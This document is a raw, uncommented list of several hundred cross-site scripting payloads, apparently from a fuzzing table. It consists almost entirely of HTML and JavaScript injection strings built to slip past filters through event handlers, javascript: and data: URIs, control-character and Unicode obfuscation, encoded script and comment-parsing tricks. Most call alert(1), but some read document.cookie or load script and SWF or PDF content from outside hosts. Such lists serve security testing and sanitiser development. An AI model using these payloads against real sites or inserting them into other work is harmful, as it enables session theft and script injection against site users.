<iframe style="position:absolute;top:0;left:0;width:100%;height:100%" onmouseover="prompt(1)"> | |
<a href="jAvAsCrIpT:alert(1)">X</a> | |
<embed src="http://corkami.googlecode.com/svn/!svn/bc/480/trunk/misc/pdf/helloworld_js_X.pdf"> | |
<object data="http://corkami.googlecode.com/svn/!svn/bc/480/trunk/misc/pdf/helloworld_js_X.pdf"> | |
<var onmouseover="prompt(1)">On Mouse Over</var> | |
<a href=javascript:alert(document.cookie)>Click Here</a> | |
<img src="/" =_=" title="onerror='prompt(1)'"> | |
<%<!--'%><script>alert(1);</script --> | |
<script src="data:text/javascript,alert(1)"></script> | |
<iframe/src \/\/onload = prompt(1) | |
<iframe/onreadystatechange=alert(1) | |
<svg/onload=alert(1) | |
<input value=<><iframe/src=javascript:confirm(1) | |
<input type="text" value=`` <div/onmouseover='alert(1)'>X</div> | |
http://www.<script>alert(1)</script .com | |
<iframe src=j
	a
		v
			a
				s
					c
						r
							i
								p
									t
										:a
											l
												e
													r
														t
															28
																1
																	%29></iframe> | |
<svg><script ?>alert(1) | |
<iframe src=j	a	v	a	s	c	r	i	p	t	:a	l	e	r	t	%28	1	%29></iframe> | |
<img src=`xx:xx`onerror=alert(1)> | |
<object type="text/x-scriptlet" data="http://jsfiddle.net/XLE63/ "></object> | |
<meta http-equiv="refresh" content="0;javascript:alert(1)"/> | |
<math><a xlink:href="//jsfiddle.net/t846h/">click | |
<embed code="http://businessinfo.co.uk/labs/xss/xss.swf" allowscriptaccess=always> | |
<svg contentScriptType=text/vbs><script>MsgBox+1 | |
<a href="data:text/html;base64_,<svg/onload=\u0061le%72t(1)>">X</a | |
<iframe/onreadystatechange=\u0061\u006C\u0065\u0072\u0074('\u0061') worksinIE> | |
<script>~'\u0061' ; \u0074\u0068\u0072\u006F\u0077 ~ \u0074\u0068\u0069\u0073. \u0061\u006C\u0065\u0072\u0074(~'\u0061')</script U+ | |
<script/src="data:text%2Fj\u0061v\u0061script,\u0061lert('\u0061')"></script a=\u0061 & /=%2F | |
<script/src=data:text/j\u0061v\u0061script,\u0061%6C%65%72%74(/XSS/)></script | |
<object data=javascript:\u0061le%72t(1)> | |
<script>+-+-1-+-+alert(1)</script> | |
<body/onload=<!-->
alert(1)> | |
<script itworksinallbrowsers>/*<script* */alert(1)</script | |
<img src ?itworksonchrome?\/onerror = alert(1) | |
<svg><script>//
confirm(1);</script </svg> | |
<svg><script onlypossibleinopera:-)> alert(1) | |
<a aa aaa aaaa aaaaa aaaaaa aaaaaaa aaaaaaaa aaaaaaaaa aaaaaaaaaa href=javascript:alert(1)>ClickMe | |
<script x> alert(1) </script 1=2 | |
<div/onmouseover='alert(1)'> style="x:"> | |
<--`<img/src=` onerror=alert(1)> --!> | |
<script/src=data:text/javascript,alert(1)></script> | |
<div style="position:absolute;top:0;left:0;width:100%;height:100%" onmouseover="prompt(1)" onclick="alert(1)">x</button> | |
"><img src=x onerror=window.open('https://www.google.com/');> | |
<form><button formaction=javascript:alert(1)>CLICKME | |
<math><a xlink:href="//jsfiddle.net/t846h/">click | |
<object data=data:text/html;base64,PHN2Zy9vbmxvYWQ9YWxlcnQoMik+></object> | |
<iframe src="data:text/html,%3C%73%63%72%69%70%74%3E%61%6C%65%72%74%28%31%29%3C%2F%73%63%72%69%70%74%3E"></iframe> | |
<a href="data:text/html;blabla,<script src="http://sternefamily.net/foo.js"></script>​">Click Me</a> | |
<script\x20type="text/javascript">javascript:alert(1);</script> | |
<script\x3Etype="text/javascript">javascript:alert(1);</script> | |
<script\x0Dtype="text/javascript">javascript:alert(1);</script> | |
<script\x09type="text/javascript">javascript:alert(1);</script> | |
<script\x0Ctype="text/javascript">javascript:alert(1);</script> | |
<script\x2Ftype="text/javascript">javascript:alert(1);</script> | |
<script\x0Atype="text/javascript">javascript:alert(1);</script> | |
'`"><\x3Cscript>javascript:alert(1)</script> | |
'`"><\x00script>javascript:alert(1)</script> | |
<img src=1 href=1 onerror="javascript:alert(1)"></img> | |
<audio src=1 href=1 onerror="javascript:alert(1)"></audio> | |
<video src=1 href=1 onerror="javascript:alert(1)"></video> | |
<body src=1 href=1 onerror="javascript:alert(1)"></body> | |
<image src=1 href=1 onerror="javascript:alert(1)"></image> | |
<object src=1 href=1 onerror="javascript:alert(1)"></object> | |
<script src=1 href=1 onerror="javascript:alert(1)"></script> | |
<svg onResize svg onResize="javascript:javascript:alert(1)"></svg onResize> | |
<title onPropertyChange title onPropertyChange="javascript:javascript:alert(1)"></title onPropertyChange> | |
<iframe onLoad iframe onLoad="javascript:javascript:alert(1)"></iframe onLoad> | |
<body onMouseEnter body onMouseEnter="javascript:javascript:alert(1)"></body onMouseEnter> | |
<body onFocus body onFocus="javascript:javascript:alert(1)"></body onFocus> | |
<frameset onScroll frameset onScroll="javascript:javascript:alert(1)"></frameset onScroll> | |
<script onReadyStateChange script onReadyStateChange="javascript:javascript:alert(1)"></script onReadyStateChange> | |
<html onMouseUp html onMouseUp="javascript:javascript:alert(1)"></html onMouseUp> | |
<body onPropertyChange body onPropertyChange="javascript:javascript:alert(1)"></body onPropertyChange> | |
<svg onLoad svg onLoad="javascript:javascript:alert(1)"></svg onLoad> | |
<body onPageHide body onPageHide="javascript:javascript:alert(1)"></body onPageHide> | |
<body onMouseOver body onMouseOver="javascript:javascript:alert(1)"></body onMouseOver> | |
<body onUnload body onUnload="javascript:javascript:alert(1)"></body onUnload> | |
<body onLoad body onLoad="javascript:javascript:alert(1)"></body onLoad> | |
<bgsound onPropertyChange bgsound onPropertyChange="javascript:javascript:alert(1)"></bgsound onPropertyChange> | |
<html onMouseLeave html onMouseLeave="javascript:javascript:alert(1)"></html onMouseLeave> | |
<html onMouseWheel html onMouseWheel="javascript:javascript:alert(1)"></html onMouseWheel> | |
<style onLoad style onLoad="javascript:javascript:alert(1)"></style onLoad> | |
<iframe onReadyStateChange iframe onReadyStateChange="javascript:javascript:alert(1)"></iframe onReadyStateChange> | |
<body onPageShow body onPageShow="javascript:javascript:alert(1)"></body onPageShow> | |
<style onReadyStateChange style onReadyStateChange="javascript:javascript:alert(1)"></style onReadyStateChange> | |
<frameset onFocus frameset onFocus="javascript:javascript:alert(1)"></frameset onFocus> | |
<applet onError applet onError="javascript:javascript:alert(1)"></applet onError> | |
<marquee onStart marquee onStart="javascript:javascript:alert(1)"></marquee onStart> | |
<script onLoad script onLoad="javascript:javascript:alert(1)"></script onLoad> | |
<html onMouseOver html onMouseOver="javascript:javascript:alert(1)"></html onMouseOver> | |
<html onMouseEnter html onMouseEnter="javascript:parent.javascript:alert(1)"></html onMouseEnter> | |
<body onBeforeUnload body onBeforeUnload="javascript:javascript:alert(1)"></body onBeforeUnload> | |
<html onMouseDown html onMouseDown="javascript:javascript:alert(1)"></html onMouseDown> | |
<marquee onScroll marquee onScroll="javascript:javascript:alert(1)"></marquee onScroll> | |
<xml onPropertyChange xml onPropertyChange="javascript:javascript:alert(1)"></xml onPropertyChange> | |
<frameset onBlur frameset onBlur="javascript:javascript:alert(1)"></frameset onBlur> | |
<applet onReadyStateChange applet onReadyStateChange="javascript:javascript:alert(1)"></applet onReadyStateChange> | |
<svg onUnload svg onUnload="javascript:javascript:alert(1)"></svg onUnload> | |
<html onMouseOut html onMouseOut="javascript:javascript:alert(1)"></html onMouseOut> | |
<body onMouseMove body onMouseMove="javascript:javascript:alert(1)"></body onMouseMove> | |
<body onResize body onResize="javascript:javascript:alert(1)"></body onResize> | |
<object onError object onError="javascript:javascript:alert(1)"></object onError> | |
<body onPopState body onPopState="javascript:javascript:alert(1)"></body onPopState> | |
<html onMouseMove html onMouseMove="javascript:javascript:alert(1)"></html onMouseMove> | |
<applet onreadystatechange applet onreadystatechange="javascript:javascript:alert(1)"></applet onreadystatechange> | |
<body onpagehide body onpagehide="javascript:javascript:alert(1)"></body onpagehide> | |
<svg onunload svg onunload="javascript:javascript:alert(1)"></svg onunload> | |
<applet onerror applet onerror="javascript:javascript:alert(1)"></applet onerror> | |
<body onkeyup body onkeyup="javascript:javascript:alert(1)"></body onkeyup> | |
<body onunload body onunload="javascript:javascript:alert(1)"></body onunload> | |
<iframe onload iframe onload="javascript:javascript:alert(1)"></iframe onload> | |
<body onload body onload="javascript:javascript:alert(1)"></body onload> | |
<html onmouseover html onmouseover="javascript:javascript:alert(1)"></html onmouseover> | |
<object onbeforeload object onbeforeload="javascript:javascript:alert(1)"></object onbeforeload> | |
<body onbeforeunload body onbeforeunload="javascript:javascript:alert(1)"></body onbeforeunload> | |
<body onfocus body onfocus="javascript:javascript:alert(1)"></body onfocus> | |
<body onkeydown body onkeydown="javascript:javascript:alert(1)"></body onkeydown> | |
<iframe onbeforeload iframe onbeforeload="javascript:javascript:alert(1)"></iframe onbeforeload> | |
<iframe src iframe src="javascript:javascript:alert(1)"></iframe src> | |
<svg onload svg onload="javascript:javascript:alert(1)"></svg onload> | |
<html onmousemove html onmousemove="javascript:javascript:alert(1)"></html onmousemove> | |
<body onblur body onblur="javascript:javascript:alert(1)"></body onblur> | |
\x3Cscript>javascript:alert(1)</script> | |
'"`><script>/* *\x2Fjavascript:alert(1)// */</script> | |
<script>javascript:alert(1)</script\x0D | |
<script>javascript:alert(1)</script\x0A | |
<script>javascript:alert(1)</script\x0B | |
<script charset="\x22>javascript:alert(1)</script> | |
<!--\x3E<img src=xxx:x onerror=javascript:alert(1)> --> | |
--><!-- ---> <img src=xxx:x onerror=javascript:alert(1)> --> | |
--><!-- --\x00> <img src=xxx:x onerror=javascript:alert(1)> --> | |
--><!-- --\x21> <img src=xxx:x onerror=javascript:alert(1)> --> | |
--><!-- --\x3E> <img src=xxx:x onerror=javascript:alert(1)> --> | |
`"'><img src='#\x27 onerror=javascript:alert(1)> | |
<a href="javascript\x3Ajavascript:alert(1)" id="fuzzelement1">test</a> | |
"'`><p><svg><script>a='hello\x27;javascript:alert(1)//';</script></p> | |
<a href="javas\x00cript:javascript:alert(1)" id="fuzzelement1">test</a> | |
<a href="javas\x07cript:javascript:alert(1)" id="fuzzelement1">test</a> | |
<a href="javas\x0Dcript:javascript:alert(1)" id="fuzzelement1">test</a> | |
<a href="javas\x0Acript:javascript:alert(1)" id="fuzzelement1">test</a> | |
<a href="javas\x08cript:javascript:alert(1)" id="fuzzelement1">test</a> | |
<a href="javas\x02cript:javascript:alert(1)" id="fuzzelement1">test</a> | |
<a href="javas\x03cript:javascript:alert(1)" id="fuzzelement1">test</a> | |
<a href="javas\x04cript:javascript:alert(1)" id="fuzzelement1">test</a> | |
<a href="javas\x01cript:javascript:alert(1)" id="fuzzelement1">test</a> | |
<a href="javas\x05cript:javascript:alert(1)" id="fuzzelement1">test</a> | |
<a href="javas\x0Bcript:javascript:alert(1)" id="fuzzelement1">test</a> | |
<a href="javas\x09cript:javascript:alert(1)" id="fuzzelement1">test</a> | |
<a href="javas\x06cript:javascript:alert(1)" id="fuzzelement1">test</a> | |
<a href="javas\x0Ccript:javascript:alert(1)" id="fuzzelement1">test</a> | |
<script>/* *\x2A/javascript:alert(1)// */</script> | |
<script>/* *\x00/javascript:alert(1)// */</script> | |
<style></style\x3E<img src="about:blank" onerror=javascript:alert(1)//></style> | |
<style></style\x0D<img src="about:blank" onerror=javascript:alert(1)//></style> | |
<style></style\x09<img src="about:blank" onerror=javascript:alert(1)//></style> | |
<style></style\x20<img src="about:blank" onerror=javascript:alert(1)//></style> | |
<style></style\x0A<img src="about:blank" onerror=javascript:alert(1)//></style> | |
"'`>ABC<div style="font-family:'foo'\x7Dx:expression(javascript:alert(1);/*';">DEF | |
"'`>ABC<div style="font-family:'foo'\x3Bx:expression(javascript:alert(1);/*';">DEF | |
<script>if("x\\xE1\x96\x89".length==2) { javascript:alert(1);}</script> | |
<script>if("x\\xE0\xB9\x92".length==2) { javascript:alert(1);}</script> | |
<script>if("x\\xEE\xA9\x93".length==2) { javascript:alert(1);}</script> | |
'`"><\x3Cscript>javascript:alert(1)</script> | |
'`"><\x00script>javascript:alert(1)</script> | |
"'`><\x3Cimg src=xxx:x onerror=javascript:alert(1)> | |
"'`><\x00img src=xxx:x onerror=javascript:alert(1)> | |
<script src="data:text/plain\x2Cjavascript:alert(1)"></script> | |
<script src="data:\xD4\x8F,javascript:alert(1)"></script> | |
<script src="data:\xE0\xA4\x98,javascript:alert(1)"></script> | |
<script src="data:\xCB\x8F,javascript:alert(1)"></script> | |
<script\x20type="text/javascript">javascript:alert(1);</script> | |
<script\x3Etype="text/javascript">javascript:alert(1);</script> | |
<script\x0Dtype="text/javascript">javascript:alert(1);</script> | |
<script\x09type="text/javascript">javascript:alert(1);</script> | |
<script\x0Ctype="text/javascript">javascript:alert(1);</script> | |
<script\x2Ftype="text/javascript">javascript:alert(1);</script> | |
<script\x0Atype="text/javascript">javascript:alert(1);</script> | |
ABC<div style="x\x3Aexpression(javascript:alert(1)">DEF | |
ABC<div style="x:expression\x5C(javascript:alert(1)">DEF | |
ABC<div style="x:expression\x00(javascript:alert(1)">DEF | |
ABC<div style="x:exp\x00ression(javascript:alert(1)">DEF | |
ABC<div style="x:exp\x5Cression(javascript:alert(1)">DEF | |
ABC<div style="x:\x0Aexpression(javascript:alert(1)">DEF | |
ABC<div style="x:\x09expression(javascript:alert(1)">DEF | |
ABC<div style="x:\xE3\x80\x80expression(javascript:alert(1)">DEF | |
ABC<div style="x:\xE2\x80\x84expression(javascript:alert(1)">DEF | |
ABC<div style="x:\xC2\xA0expression(javascript:alert(1)">DEF | |
ABC<div style="x:\xE2\x80\x80expression(javascript:alert(1)">DEF | |
ABC<div style="x:\xE2\x80\x8Aexpression(javascript:alert(1)">DEF | |
ABC<div style="x:\x0Dexpression(javascript:alert(1)">DEF | |
ABC<div style="x:\x0Cexpression(javascript:alert(1)">DEF | |
ABC<div style="x:\xE2\x80\x87expression(javascript:alert(1)">DEF | |
ABC<div style="x:\xEF\xBB\xBFexpression(javascript:alert(1)">DEF | |
ABC<div style="x:\x20expression(javascript:alert(1)">DEF | |
ABC<div style="x:\xE2\x80\x88expression(javascript:alert(1)">DEF | |
ABC<div style="x:\x00expression(javascript:alert(1)">DEF | |
ABC<div style="x:\xE2\x80\x8Bexpression(javascript:alert(1)">DEF | |
ABC<div style="x:\xE2\x80\x86expression(javascript:alert(1)">DEF | |
ABC<div style="x:\xE2\x80\x85expression(javascript:alert(1)">DEF | |
ABC<div style="x:\xE2\x80\x82expression(javascript:alert(1)">DEF | |
ABC<div style="x:\x0Bexpression(javascript:alert(1)">DEF | |
ABC<div style="x:\xE2\x80\x81expression(javascript:alert(1)">DEF | |
ABC<div style="x:\xE2\x80\x83expression(javascript:alert(1)">DEF | |
ABC<div style="x:\xE2\x80\x89expression(javascript:alert(1)">DEF | |
<a href="\x0Bjavascript:javascript:alert(1)" id="fuzzelement1">test</a> | |
<a href="\x0Fjavascript:javascript:alert(1)" id="fuzzelement1">test</a> | |
<a href="\xC2\xA0javascript:javascript:alert(1)" id="fuzzelement1">test</a> | |
<a href="\x05javascript:javascript:alert(1)" id="fuzzelement1">test</a> | |
<a href="\xE1\xA0\x8Ejavascript:javascript:alert(1)" id="fuzzelement1">test</a> | |
<a href="\x18javascript:javascript:alert(1)" id="fuzzelement1">test</a> | |
<a href="\x11javascript:javascript:alert(1)" id="fuzzelement1">test</a> | |
<a href="\xE2\x80\x88javascript:javascript:alert(1)" id="fuzzelement1">test</a> | |
<a href="\xE2\x80\x89javascript:javascript:alert(1)" id="fuzzelement1">test</a> | |
<a href="\xE2\x80\x80javascript:javascript:alert(1)" id="fuzzelement1">test</a> | |
<a href="\x17javascript:javascript:alert(1)" id="fuzzelement1">test</a> | |
<a href="\x03javascript:javascript:alert(1)" id="fuzzelement1">test</a> | |
<a href="\x0Ejavascript:javascript:alert(1)" id="fuzzelement1">test</a> | |
<a href="\x1Ajavascript:javascript:alert(1)" id="fuzzelement1">test</a> | |
<a href="\x00javascript:javascript:alert(1)" id="fuzzelement1">test</a> | |
<a href="\x10javascript:javascript:alert(1)" id="fuzzelement1">test</a> | |
<a href="\xE2\x80\x82javascript:javascript:alert(1)" id="fuzzelement1">test</a> | |
<a href="\x20javascript:javascript:alert(1)" id="fuzzelement1">test</a> | |
<a href="\x13javascript:javascript:alert(1)" id="fuzzelement1">test</a> | |
<a href="\x09javascript:javascript:alert(1)" id="fuzzelement1">test</a> | |
<a href="\xE2\x80\x8Ajavascript:javascript:alert(1)" id="fuzzelement1">test</a> | |
<a href="\x14javascript:javascript:alert(1)" id="fuzzelement1">test</a> | |
<a href="\x19javascript:javascript:alert(1)" id="fuzzelement1">test</a> | |
<a href="\xE2\x80\xAFjavascript:javascript:alert(1)" id="fuzzelement1">test</a> | |
<a href="\x1Fjavascript:javascript:alert(1)" id="fuzzelement1">test</a> | |
<a href="\xE2\x80\x81javascript:javascript:alert(1)" id="fuzzelement1">test</a> | |
<a href="\x1Djavascript:javascript:alert(1)" id="fuzzelement1">test</a> | |
<a href="\xE2\x80\x87javascript:javascript:alert(1)" id="fuzzelement1">test</a> | |
<a href="\x07javascript:javascript:alert(1)" id="fuzzelement1">test</a> | |
<a href="\xE1\x9A\x80javascript:javascript:alert(1)" id="fuzzelement1">test</a> | |
<a href="\xE2\x80\x83javascript:javascript:alert(1)" id="fuzzelement1">test</a> | |
<a href="\x04javascript:javascript:alert(1)" id="fuzzelement1">test</a> | |
<a href="\x01javascript:javascript:alert(1)" id="fuzzelement1">test</a> | |
<a href="\x08javascript:javascript:alert(1)" id="fuzzelement1">test</a> | |
<a href="\xE2\x80\x84javascript:javascript:alert(1)" id="fuzzelement1">test</a> | |
<a href="\xE2\x80\x86javascript:javascript:alert(1)" id="fuzzelement1">test</a> | |
<a href="\xE3\x80\x80javascript:javascript:alert(1)" id="fuzzelement1">test</a> | |
<a href="\x12javascript:javascript:alert(1)" id="fuzzelement1">test</a> | |
<a href="\x0Djavascript:javascript:alert(1)" id="fuzzelement1">test</a> | |
<a href="\x0Ajavascript:javascript:alert(1)" id="fuzzelement1">test</a> | |
<a href="\x0Cjavascript:javascript:alert(1)" id="fuzzelement1">test</a> | |
<a href="\x15javascript:javascript:alert(1)" id="fuzzelement1">test</a> | |
<a href="\xE2\x80\xA8javascript:javascript:alert(1)" id="fuzzelement1">test</a> | |
<a href="\x16javascript:javascript:alert(1)" id="fuzzelement1">test</a> | |
<a href="\x02javascript:javascript:alert(1)" id="fuzzelement1">test</a> | |
<a href="\x1Bjavascript:javascript:alert(1)" id="fuzzelement1">test</a> | |
<a href="\x06javascript:javascript:alert(1)" id="fuzzelement1">test</a> | |
<a href="\xE2\x80\xA9javascript:javascript:alert(1)" id="fuzzelement1">test</a> | |
<a href="\xE2\x80\x85javascript:javascript:alert(1)" id="fuzzelement1">test</a> | |
<a href="\x1Ejavascript:javascript:alert(1)" id="fuzzelement1">test</a> | |
<a href="\xE2\x81\x9Fjavascript:javascript:alert(1)" id="fuzzelement1">test</a> | |
<a href="\x1Cjavascript:javascript:alert(1)" id="fuzzelement1">test</a> | |
<a href="javascript\x00:javascript:alert(1)" id="fuzzelement1">test</a> | |
<a href="javascript\x3A:javascript:alert(1)" id="fuzzelement1">test</a> | |
<a href="javascript\x09:javascript:alert(1)" id="fuzzelement1">test</a> | |
<a href="javascript\x0D:javascript:alert(1)" id="fuzzelement1">test</a> | |
<a href="javascript\x0A:javascript:alert(1)" id="fuzzelement1">test</a> | |
`"'><img src=xxx:x \x0Aonerror=javascript:alert(1)> | |
`"'><img src=xxx:x \x22onerror=javascript:alert(1)> | |
`"'><img src=xxx:x \x0Bonerror=javascript:alert(1)> | |
`"'><img src=xxx:x \x0Donerror=javascript:alert(1)> | |
`"'><img src=xxx:x \x2Fonerror=javascript:alert(1)> | |
`"'><img src=xxx:x \x09onerror=javascript:alert(1)> | |
`"'><img src=xxx:x \x0Conerror=javascript:alert(1)> | |
`"'><img src=xxx:x \x00onerror=javascript:alert(1)> | |
`"'><img src=xxx:x \x27onerror=javascript:alert(1)> | |
`"'><img src=xxx:x \x20onerror=javascript:alert(1)> | |
"`'><script>\x3Bjavascript:alert(1)</script> | |
"`'><script>\x0Djavascript:alert(1)</script> | |
"`'><script>\xEF\xBB\xBFjavascript:alert(1)</script> | |
"`'><script>\xE2\x80\x81javascript:alert(1)</script> | |
"`'><script>\xE2\x80\x84javascript:alert(1)</script> | |
"`'><script>\xE3\x80\x80javascript:alert(1)</script> | |
"`'><script>\x09javascript:alert(1)</script> | |
"`'><script>\xE2\x80\x89javascript:alert(1)</script> | |
"`'><script>\xE2\x80\x85javascript:alert(1)</script> | |
"`'><script>\xE2\x80\x88javascript:alert(1)</script> | |
"`'><script>\x00javascript:alert(1)</script> | |
"`'><script>\xE2\x80\xA8javascript:alert(1)</script> | |
"`'><script>\xE2\x80\x8Ajavascript:alert(1)</script> | |
"`'><script>\xE1\x9A\x80javascript:alert(1)</script> | |
"`'><script>\x0Cjavascript:alert(1)</script> | |
"`'><script>\x2Bjavascript:alert(1)</script> | |
"`'><script>\xF0\x90\x96\x9Ajavascript:alert(1)</script> | |
"`'><script>-javascript:alert(1)</script> | |
"`'><script>\x0Ajavascript:alert(1)</script> | |
"`'><script>\xE2\x80\xAFjavascript:alert(1)</script> | |
"`'><script>\x7Ejavascript:alert(1)</script> | |
"`'><script>\xE2\x80\x87javascript:alert(1)</script> | |
"`'><script>\xE2\x81\x9Fjavascript:alert(1)</script> | |
"`'><script>\xE2\x80\xA9javascript:alert(1)</script> | |
"`'><script>\xC2\x85javascript:alert(1)</script> | |
"`'><script>\xEF\xBF\xAEjavascript:alert(1)</script> | |
"`'><script>\xE2\x80\x83javascript:alert(1)</script> | |
"`'><script>\xE2\x80\x8Bjavascript:alert(1)</script> | |
"`'><script>\xEF\xBF\xBEjavascript:alert(1)</script> | |
"`'><script>\xE2\x80\x80javascript:alert(1)</script> | |
"`'><script>\x21javascript:alert(1)</script> | |
"`'><script>\xE2\x80\x82javascript:alert(1)</script> | |
"`'><script>\xE2\x80\x86javascript:alert(1)</script> | |
"`'><script>\xE1\xA0\x8Ejavascript:alert(1)</script> | |
"`'><script>\x0Bjavascript:alert(1)</script> | |
"`'><script>\x20javascript:alert(1)</script> | |
"`'><script>\xC2\xA0javascript:alert(1)</script> | |
"/><img/onerror=\x0Bjavascript:alert(1)\x0Bsrc=xxx:x /> | |
"/><img/onerror=\x22javascript:alert(1)\x22src=xxx:x /> | |
"/><img/onerror=\x09javascript:alert(1)\x09src=xxx:x /> | |
"/><img/onerror=\x27javascript:alert(1)\x27src=xxx:x /> | |
"/><img/onerror=\x0Ajavascript:alert(1)\x0Asrc=xxx:x /> | |
"/><img/onerror=\x0Cjavascript:alert(1)\x0Csrc=xxx:x /> | |
"/><img/onerror=\x0Djavascript:alert(1)\x0Dsrc=xxx:x /> | |
"/><img/onerror=\x60javascript:alert(1)\x60src=xxx:x /> | |
"/><img/onerror=\x20javascript:alert(1)\x20src=xxx:x /> | |
<script\x2F>javascript:alert(1)</script> | |
<script\x20>javascript:alert(1)</script> | |
<script\x0D>javascript:alert(1)</script> | |
<script\x0A>javascript:alert(1)</script> | |
<script\x0C>javascript:alert(1)</script> | |
<script\x00>javascript:alert(1)</script> | |
<script\x09>javascript:alert(1)</script> | |
"><img src=x onerror=javascript:alert(1)> | |
"><img src=x onerror=javascript:alert('1')> | |
"><img src=x onerror=javascript:alert("1")> | |
"><img src=x onerror=javascript:alert(`1`)> | |
"><img src=x onerror=javascript:alert(('1'))> | |
"><img src=x onerror=javascript:alert(("1"))> | |
"><img src=x onerror=javascript:alert((`1`))> | |
"><img src=x onerror=javascript:alert(A)> | |
"><img src=x onerror=javascript:alert((A))> | |
"><img src=x onerror=javascript:alert(('A'))> | |
"><img src=x onerror=javascript:alert('A')> | |
"><img src=x onerror=javascript:alert(("A"))> | |
"><img src=x onerror=javascript:alert("A")> | |
"><img src=x onerror=javascript:alert((`A`))> | |
"><img src=x onerror=javascript:alert(`A`)> | |
`"'><img src=xxx:x onerror\x0B=javascript:alert(1)> | |
`"'><img src=xxx:x onerror\x00=javascript:alert(1)> | |
`"'><img src=xxx:x onerror\x0C=javascript:alert(1)> | |
`"'><img src=xxx:x onerror\x0D=javascript:alert(1)> | |
`"'><img src=xxx:x onerror\x20=javascript:alert(1)> | |
`"'><img src=xxx:x onerror\x0A=javascript:alert(1)> | |
`"'><img src=xxx:x onerror\x09=javascript:alert(1)> | |
<script>javascript:alert(1)<\x00/script> | |
<img src=# onerror\x3D"javascript:alert(1)" > | |
<input onfocus=javascript:alert(1) autofocus> | |
<input onblur=javascript:alert(1) autofocus><input autofocus> | |
<video poster=javascript:javascript:alert(1)// | |
<body onscroll=javascript:alert(1)><br><br><br><br><br><br>...<br><br><br><br><br><br><br><br><br><br>...<br><br><br><br><br><br><br><br><br><br>...<br><br><br><br><br><br><br><br><br><br>...<br><br><br><br><br><br><br><br><br><br>...<br><br><br><br><input autofocus> | |
<form id=test onforminput=javascript:alert(1)><input></form><button form=test onformchange=javascript:alert(1)>X | |
<video><source onerror="javascript:javascript:alert(1)"> | |
<video onerror="javascript:javascript:alert(1)"><source> | |
<form><button formaction="javascript:javascript:alert(1)">X | |
<body oninput=javascript:alert(1)><input autofocus> | |
<math href="javascript:javascript:alert(1)">CLICKME</math> <math> <maction actiontype="statusline#http://google.com" xlink:href="javascript:javascript:alert(1)">CLICKME</maction> </math> | |
<frameset onload=javascript:alert(1)> | |
<table background="javascript:javascript:alert(1)"> | |
<!--<img src="--><img src=x onerror=javascript:alert(1)//"> | |
<comment><img src="</comment><img src=x onerror=javascript:alert(1))//"> | |
<![><img src="]><img src=x onerror=javascript:alert(1)//"> | |
<style><img src="</style><img src=x onerror=javascript:alert(1)//"> | |
<li style=list-style:url() onerror=javascript:alert(1)> <div style=content:url(data:image/svg+xml,%%3Csvg/%%3E);visibility:hidden onload=javascript:alert(1)></div> | |
<head><base href="javascript://"></head><body><a href="/. /,javascript:alert(1)//#">XXX</a></body> | |
<SCRIPT FOR=document EVENT=onreadystatechange>javascript:alert(1)</SCRIPT> | |
<OBJECT CLASSID="clsid:333C7BC4-460F-11D0-BC04-0080C7055A83"><PARAM NAME="DataURL" VALUE="javascript:alert(1)"></OBJECT> | |
<object data="data:text/html;base64,%(base64)s"> | |
<embed src="data:text/html;base64,%(base64)s"> | |
<b <script>alert(1)</script>0 | |
<div id="div1"><input value="``onmouseover=javascript:alert(1)"></div> <div id="div2"></div><script>document.getElementById("div2").innerHTML = document.getElementById("div1").innerHTML;</script> | |
<x '="foo"><x foo='><img src=x onerror=javascript:alert(1)//'> | |
<embed src="javascript:alert(1)"> | |
<img src="javascript:alert(1)"> | |
<image src="javascript:alert(1)"> | |
<script src="javascript:alert(1)"> | |
<div style=width:1px;filter:glow onfilterchange=javascript:alert(1)>x | |
<? foo="><script>javascript:alert(1)</script>"> | |
<! foo="><script>javascript:alert(1)</script>"> | |
</ foo="><script>javascript:alert(1)</script>"> | |
<? foo="><x foo='?><script>javascript:alert(1)</script>'>"> | |
<! foo="[[[Inception]]"><x foo="]foo><script>javascript:alert(1)</script>"> | |
<% foo><x foo="%><script>javascript:alert(1)</script>"> | |
<div id=d><x xmlns="><iframe onload=javascript:alert(1)"></div> <script>d.innerHTML=d.innerHTML</script> | |
<img \x00src=x onerror="alert(1)"> | |
<img \x47src=x onerror="javascript:alert(1)"> | |
<img \x11src=x onerror="javascript:alert(1)"> | |
<img \x12src=x onerror="javascript:alert(1)"> | |
<img\x47src=x onerror="javascript:alert(1)"> | |
<img\x10src=x onerror="javascript:alert(1)"> | |
<img\x13src=x onerror="javascript:alert(1)"> | |
<img\x32src=x onerror="javascript:alert(1)"> | |
<img\x47src=x onerror="javascript:alert(1)"> | |
<img\x11src=x onerror="javascript:alert(1)"> | |
<img \x47src=x onerror="javascript:alert(1)"> | |
<img \x34src=x onerror="javascript:alert(1)"> | |
<img \x39src=x onerror="javascript:alert(1)"> | |
<img \x00src=x onerror="javascript:alert(1)"> | |
<img src\x09=x onerror="javascript:alert(1)"> | |
<img src\x10=x onerror="javascript:alert(1)"> | |
<img src\x13=x onerror="javascript:alert(1)"> | |
<img src\x32=x onerror="javascript:alert(1)"> | |
<img src\x12=x onerror="javascript:alert(1)"> | |
<img src\x11=x onerror="javascript:alert(1)"> | |
<img src\x00=x onerror="javascript:alert(1)"> | |
<img src\x47=x onerror="javascript:alert(1)"> | |
<img src=x\x09onerror="javascript:alert(1)"> | |
<img src=x\x10onerror="javascript:alert(1)"> | |
<img src=x\x11onerror="javascript:alert(1)"> | |
<img src=x\x12onerror="javascript:alert(1)"> | |
<img src=x\x13onerror="javascript:alert(1)"> | |
<img[a][b][c]src[d]=x[e]onerror=[f]"alert(1)"> | |
<img src=x onerror=\x09"javascript:alert(1)"> | |
<img src=x onerror=\x10"javascript:alert(1)"> | |
<img src=x onerror=\x11"javascript:alert(1)"> | |
<img src=x onerror=\x12"javascript:alert(1)"> | |
<img src=x onerror=\x32"javascript:alert(1)"> | |
<img src=x onerror=\x00"javascript:alert(1)"> | |
<a href=javascript:javascript:alert(1)>XXX</a> | |
<img src="x` `<script>javascript:alert(1)</script>"` `> | |
<img src onerror /" '"= alt=javascript:alert(1)//"> | |
<title onpropertychange=javascript:alert(1)></title><title title=> | |
<a href=http://foo.bar/#x=`y></a><img alt="`><img src=x:x onerror=javascript:alert(1)></a>"> | |
<!--[if]><script>javascript:alert(1)</script --> | |
<!--[if<img src=x onerror=javascript:alert(1)//]> --> | |
<script src="/\%(jscript)s"></script> | |
<script src="\\%(jscript)s"></script> | |
